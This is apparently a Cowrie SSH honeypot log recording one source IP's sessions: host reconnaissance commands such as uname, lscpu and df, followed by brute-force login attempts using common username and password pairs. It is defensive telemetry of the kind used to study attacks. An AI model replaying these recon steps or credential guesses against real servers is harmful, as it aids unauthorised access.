{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:26.965874Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:27.579615Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T22:54:27.580302Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:27.834804Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:28.360409Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:54:28.361372Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:28.613378Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:29.230606Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:54:29.231546Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:29.482886Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:30.057587Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:54:30.058315Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:30.308879Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:30.827294Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:54:30.827961Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:31.079675Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:31.682249Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:54:31.683125Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:31.933395Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:32.451123Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:54:32.451787Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:32.702322Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55912,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f424b64d34","protocol":"ssh","message":"New connection: 212.227.235.229:55912 (1.2.3.4:22) [session: 96f424b64d34]","sensor":"my-vps","timestamp":"2025-09-08T22:54:32.772659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:32.773523Z","src_ip":"212.227.235.229","session":"96f424b64d34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47366,"dst_ip":"1.2.3.4","dst_port":22,"session":"a250c8a32cee","protocol":"ssh","message":"New connection: 212.227.235.229:47366 (1.2.3.4:22) [session: a250c8a32cee]","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.062291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.063143Z","src_ip":"212.227.235.229","session":"a250c8a32cee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.105125Z","src_ip":"212.227.235.229","session":"96f424b64d34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:54:33.303888Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.304581Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.306953Z","src_ip":"212.227.235.229","session":"a250c8a32cee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.556077Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.session.closed","duration":"28.5","message":"Connection lost after 28.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:33.557253Z","src_ip":"212.227.235.229","session":"49ae08d656e5"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"hammer.123","message":"login attempt [hammer/hammer.123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:34.285898Z","src_ip":"212.227.235.229","session":"a250c8a32cee"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:54:34.472496Z","src_ip":"212.227.235.229","session":"96f424b64d34"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:35.524069Z","src_ip":"212.227.235.229","session":"a250c8a32cee"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:35.806339Z","src_ip":"212.227.235.229","session":"96f424b64d34"}
{"eventid":"cowrie.session.closed","duration":"302.1","message":"Connection lost after 302.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:54:51.383175Z","src_ip":"212.227.235.229","session":"6fa1d107adbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57814,"dst_ip":"1.2.3.4","dst_port":22,"session":"bed57d26aa3c","protocol":"ssh","message":"New connection: 212.227.235.229:57814 (1.2.3.4:22) [session: bed57d26aa3c]","sensor":"my-vps","timestamp":"2025-09-08T22:55:00.783231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:00.784029Z","src_ip":"212.227.235.229","session":"bed57d26aa3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:01.097332Z","src_ip":"212.227.235.229","session":"bed57d26aa3c"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:02.346997Z","src_ip":"212.227.235.229","session":"bed57d26aa3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37646,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fa5f1b5fb85","protocol":"ssh","message":"New connection: 212.227.235.229:37646 (1.2.3.4:22) [session: 1fa5f1b5fb85]","sensor":"my-vps","timestamp":"2025-09-08T22:55:02.747958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:02.748746Z","src_ip":"212.227.235.229","session":"1fa5f1b5fb85"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:02.848966Z","src_ip":"212.227.235.229","session":"1fa5f1b5fb85"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:03.290980Z","src_ip":"212.227.235.229","session":"1fa5f1b5fb85"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:03.660775Z","src_ip":"212.227.235.229","session":"bed57d26aa3c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:04.392963Z","src_ip":"212.227.235.229","session":"1fa5f1b5fb85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55804,"dst_ip":"1.2.3.4","dst_port":22,"session":"13011588e070","protocol":"ssh","message":"New connection: 212.227.235.229:55804 (1.2.3.4:22) [session: 13011588e070]","sensor":"my-vps","timestamp":"2025-09-08T22:55:12.510773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:12.537084Z","src_ip":"212.227.235.229","session":"13011588e070"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:12.797986Z","src_ip":"212.227.235.229","session":"13011588e070"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password123","message":"login attempt [debian/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:13.782010Z","src_ip":"212.227.235.229","session":"13011588e070"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:15.035155Z","src_ip":"212.227.235.229","session":"13011588e070"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47680,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f153eeebea4","protocol":"ssh","message":"New connection: 212.227.235.229:47680 (1.2.3.4:22) [session: 8f153eeebea4]","sensor":"my-vps","timestamp":"2025-09-08T22:55:19.108026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:19.108940Z","src_ip":"212.227.235.229","session":"8f153eeebea4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:19.204443Z","src_ip":"212.227.235.229","session":"8f153eeebea4"}
{"eventid":"cowrie.login.failed","username":"builder","password":"111","message":"login attempt [builder/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:19.635442Z","src_ip":"212.227.235.229","session":"8f153eeebea4"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:20.739063Z","src_ip":"212.227.235.229","session":"8f153eeebea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35070,"dst_ip":"1.2.3.4","dst_port":22,"session":"90afb8485a0d","protocol":"ssh","message":"New connection: 212.227.235.229:35070 (1.2.3.4:22) [session: 90afb8485a0d]","sensor":"my-vps","timestamp":"2025-09-08T22:55:29.556454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:29.557322Z","src_ip":"212.227.235.229","session":"90afb8485a0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:29.693450Z","src_ip":"212.227.235.229","session":"90afb8485a0d"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser@123","message":"login attempt [ftpuser/ftpuser@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:30.273824Z","src_ip":"212.227.235.229","session":"90afb8485a0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47326,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4e446bb4f41","protocol":"ssh","message":"New connection: 212.227.235.229:47326 (1.2.3.4:22) [session: d4e446bb4f41]","sensor":"my-vps","timestamp":"2025-09-08T22:55:30.791492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:30.792355Z","src_ip":"212.227.235.229","session":"d4e446bb4f41"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:31.409998Z","src_ip":"212.227.235.229","session":"90afb8485a0d"}
